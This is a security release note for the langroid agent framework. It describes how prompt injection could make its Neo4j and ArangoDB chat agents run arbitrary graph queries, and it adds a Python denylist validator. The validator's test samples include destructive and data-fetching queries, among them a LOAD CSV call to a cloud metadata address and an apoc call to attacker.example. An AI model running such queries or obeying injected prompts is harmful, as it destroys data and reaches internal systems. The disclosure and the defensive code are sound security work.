
langroid

v0.65.5 (security release)

This release ships one security advisory, GHSA-2pq5-3q89-j7cc, covering two agents (Neo4jChatAgent and ArangoChatAgent). It matters to teams that expose either agent to untrusted input, directly or through retrieved content.

No CVE identifier is listed for this release's fix; it is tracked under the GHSA above. The CVE-2026-25879 reference further down this page is the earlier SQLChatAgent issue, fixed in 0.63.0, and is cited only as the same defect class.

Topics

agents, ai, chatgpt, function-calling, llm, gpt-4, gpt4, information-retrieval, language-model, llama, llm-agent, llm-framework, local-llm, multi-agent-systems, openai-api, retrieval-augmented-generation

Affected surfaces

RCE (conditional on database configuration) and SSRF

ReleasePort's take

Moderate signal

Version 0.65.5 blocks prompt‑injection to query execution in Neo4jChatAgent and ArangoChatAgent by default.

Why it matters: before this release, anyone who could influence the agent's prompt (directly, or through content the agent reads back via RAG) could get arbitrary Cypher or AQL executed against the graph database. The mitigation is on by default, so upgrading alone closes the issue; no configuration change is needed unless you have deliberately set allow_dangerous_operations=True.

Summary

AI summary

Security fix closes prompt‑injection to query execution in Neo4jChatAgent (Cypher) and ArangoChatAgent (AQL).

Changes in this release

Security Critical

Blocks prompt‑injection to query execution in Neo4jChatAgent and ArangoChatAgent by default.

Source: llm_adapter@2026-06-15

Confidence: high

Breaking High

Restricts retrieval tools to read‑only queries; write or admin clauses are rejected by default.

Source: llm_adapter@2026-06-15

Confidence: high

Breaking High

Blocks code‑execution, file, and network primitives in creation tools by default.

Source: llm_adapter@2026-06-15

Confidence: high

Feature Medium

Adds `allow_dangerous_operations` config flag (default False) to toggle unrestricted query execution.

Source: llm_adapter@2026-06-15

Confidence: high

Full changelog

0.65.5 — Security release

A security patch closing a prompt-injection-to-query-execution flaw in the graph-database chat agents, Neo4jChatAgent (Cypher) and ArangoChatAgent (AQL). Upgrading is strongly recommended for anyone exposing either agent to untrusted input, whether directly or indirectly via content the agent reads back through RAG.

pip install -U langroid

Security fix

Neo4jChatAgent / ArangoChatAgent executed LLM-generated queries without validation

Advisory: GHSA-2pq5-3q89-j7cc (severity: High)

Neo4jChatAgent passed LLM-generated Cypher, and ArangoChatAgent passed
LLM-generated AQL, straight to the database driver with no validation and no
opt-out gate. Because the query text is influenceable by prompt injection, an
attacker who could steer the prompt could:

  • read or destroy all graph data (e.g. Cypher MATCH (n) DETACH DELETE n) and
    use the LOAD CSV remote-fetch (SSRF) primitive — present regardless of
    server configuration; and
  • escalate toward OS-command / filesystem access (config-conditional RCE) where
    APOC or dbms.security procedures (Neo4j), or user-defined functions / Foxx
    (Arango), are enabled on the database role.

This is the same defect class as the SQLChatAgent prompt-to-SQL-to-RCE issue
fixed in 0.63.0 (CVE-2026-25879); that fix did not extend to the graph-DB
agents.

Fix: both agents now mirror the SQLChatAgent controls. A new
allow_dangerous_operations config flag (default False) gates execution; with
the default value:

  • the retrieval tool is restricted to read-only queries (write/admin clauses
    are rejected);
  • the creation tool allows ordinary writes;
  • both tools reject code-execution / file / network primitives (LOAD CSV,
    apoc.*, dbms.*, CALL db.* for Cypher; user-defined namespace::func
    calls for AQL).

Validation runs at the tool handlers, so internal schema-introspection and
maintenance calls are unaffected. Reported by
@matte1782.

Behavior change

By default (allow_dangerous_operations=False), LLM-generated graph queries are
now restricted:

  • cypher_retrieval_tool / aql_retrieval_tool execute read-only queries; a
    write or admin clause is rejected and the reason is returned to the LLM.
  • cypher_creation_tool / aql_creation_tool still perform writes, but
    code-execution / file / network primitives are blocked.
  • To restore the previous unrestricted behavior (only safe with a
    least-privilege DB role and trusted prompts), set
    allow_dangerous_operations=True on Neo4jChatAgentConfig /
    ArangoChatAgentConfig.
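The Fix list and the Behavior change section above describe the same three controls from two angles. The block below is an added, standalone Python illustration of those controls; it is not langroid's code, and the names in it (`normalize`, `RULES`, `check_query`, `tool_handler`, `Verdict`) and the sample queries are hypothetical and constructed for the example. The real flag lives on Neo4jChatAgentConfig / ArangoChatAgentConfig, and the project's own validators run inside the tool handlers with rules this example only approximates:

```python
import re
from dataclasses import dataclass
from typing import Callable

# Hypothetical guard mirroring the release's controls (added example, not langroid's code).
# One pass over string literals, backtick identifiers and comments. A single pass matters:
# stripping comments first would let '/*' ... '*/' inside two string literals swallow
# whatever clause sits between them.
_TOKENS = re.compile(
    r"'(?:\\.|[^'\\])*'"          # single-quoted string
    r"|\"(?:\\.|[^\"\\])*\""      # double-quoted string
    r"|`[^`]*`"                   # backtick-quoted identifier (Cypher)
    r"|/\*.*?\*/"                 # block comment
    r"|//[^\n]*",                 # line comment
    re.DOTALL,
)


def normalize(query: str) -> str:
    """Replace literals with a placeholder, drop comments, collapse whitespace."""
    def repl(m: re.Match) -> str:
        return " " if m.group(0).startswith(("/*", "//")) else "'?'"
    return re.sub(r"\s+", " ", _TOKENS.sub(repl, query)).strip()


# Per dialect: (write/admin clauses rejected by the retrieval tool,
#               code-execution / file / network primitives rejected by both tools)
RULES = {
    "cypher": (
        re.compile(r"\b(CREATE|MERGE|DELETE|SET|REMOVE|DROP|ALTER|GRANT|DENY|REVOKE"
                   r"|START\s+DATABASE|STOP\s+DATABASE)\b", re.I),
        re.compile(r"\bLOAD\s+CSV\b|\bapoc\s*\.|\bdbms\s*\.|\bCALL\s+db\s*\.", re.I),
    ),
    "aql": (
        re.compile(r"\b(INSERT|UPDATE|REPLACE|REMOVE|UPSERT)\b", re.I),
        # user-defined AQL functions are always namespaced: NS::FUNC(...)
        re.compile(r"\b\w+\s*::\s*\w+\s*\("),
    ),
}


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def check_query(query: str, dialect: str, tool: str,
                allow_dangerous_operations: bool = False) -> Verdict:
    """Validate an LLM-generated query for the 'retrieval' or 'creation' tool."""
    if tool not in ("retrieval", "creation"):
        raise ValueError(f"unknown tool {tool!r}")
    if allow_dangerous_operations:          # the opt-out: no validation at all
        return Verdict(True, "unrestricted: allow_dangerous_operations=True")
    write_re, danger_re = RULES[dialect]
    q = normalize(query)
    if (m := danger_re.search(q)):
        return Verdict(False, f"code-execution/file/network primitive blocked: {m.group(0).strip()!r}")
    if tool == "retrieval" and (m := write_re.search(q)):
        return Verdict(False, f"retrieval tool is read-only; clause {m.group(0).upper()!r} rejected")
    return Verdict(True, "ok")


def tool_handler(query: str, dialect: str, tool: str,
                 execute: Callable[[str], str], **cfg) -> str:
    """Shape of a guarded tool handler: a rejection reason goes back to the LLM and
    the query never reaches the driver; an allowed query is passed to `execute`."""
    v = check_query(query, dialect, tool, **cfg)
    return execute(query) if v.allowed else f"REJECTED: {v.reason}"


# Constructed sample queries: (dialect, tool, query, expected to be allowed)
SAMPLES = [
    ("cypher", "retrieval", "MATCH (p:Person)-[:KNOWS]->(q) RETURN p.name, q.name LIMIT 10", True),
    ("cypher", "retrieval", "MATCH (n) DETACH /* hidden */ DELETE n", False),
    ("cypher", "retrieval", "MATCH (n {note: 'please DELETE me'}) RETURN n", True),   # keyword is data
    ("cypher", "retrieval", "MATCH (n) WHERE n.x = '/*' DETACH DELETE n RETURN '*/'", False),
    ("cypher", "creation",  "CREATE (p:Person {name: 'Ada'}) RETURN p", True),
    ("cypher", "creation",  "LOAD CSV FROM 'http://169.254.169.254/latest/meta-data/' AS row RETURN row", False),
    ("cypher", "creation",  "CALL apoc.load.json('http://attacker.example/x.json') YIELD value RETURN value", False),
    ("cypher", "retrieval", "CALL dbms.listConfig() YIELD name, value RETURN name", False),
    ("aql", "retrieval", "FOR d IN docs FILTER d.year > 2020 RETURN d.title", True),
    ("aql", "retrieval", "FOR d IN docs REMOVE d IN docs", False),
    ("aql", "creation",  "INSERT {title: 'x'} INTO docs", True),
    ("aql", "creation",  "RETURN myns::exec('ls')", False),
]

if __name__ == "__main__":
    for dialect, tool, query, expected in SAMPLES:
        v = check_query(query, dialect, tool)
        assert v.allowed == expected, (query, v)
        print(f"{dialect:6} {tool:9} {'ALLOW ' if v.allowed else 'REJECT'} {query[:60]}  ({v.reason})")
```

Two design points worth noting. First, the guard is a denylist, so it is deliberately conservative: a node variable named `dbms` or a label written as `` `DELETE` `` would be refused even though they are harmless, and any clause the list does not know about passes. That is why the release notes say unrestricted mode is "only safe with a least-privilege DB role and trusted prompts"; the database role, not the regex, is the real boundary. Second, the handler returns the rejection reason rather than raising, which matches the described behaviour of handing the reason back to the LLM so it can retry with a read-only query.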

Upgrade

pip install -U langroid

Full changelog: 0.65.4...0.65.5

Security Fixes

  • GHSA-2pq5-3q89-j7cc — High: Neo4jChatAgent and ArangoChatAgent executed LLM‑generated Cypher/AQL queries without validation, enabling data read/write or remote code execution; fixed by adding `allow_dangerous_operations` flag (default False) that restricts retrieval to read‑only and blocks code‑execution primitives.
  • CVE-2026-25879 (related, not patched in this release): the SQLChatAgent prompt‑to‑SQL‑to‑RCE issue fixed in 0.63.0, the same defect class as the advisory above.


About langroid

Harness LLMs with Multi-Agent Programming


Related context

Earlier breaking changes

  • v0.65.3 Raw user messages containing tools registered with `enable_message(..., use=False, handle=True)` are now dropped instead of executed.
  • v0.65.2 Restricts eval'd expression builtins to a curated safe set, breaking code that relied on full Python builtins (e.g., __import__, open).
  • v0.65.1 Rejects additional PostgreSQL-specific obfuscations of dangerous functions like `pg_read_file` in `SQLChatAgent`.
  • v0.65.0 Default PDF parser switched from pymupdf4llm to pypdfium2; AGPL dependency removed.
  • v0.64.0 Rejects PostgreSQL/SQLite/MSSQL primitives that enable arbitrary file reads.
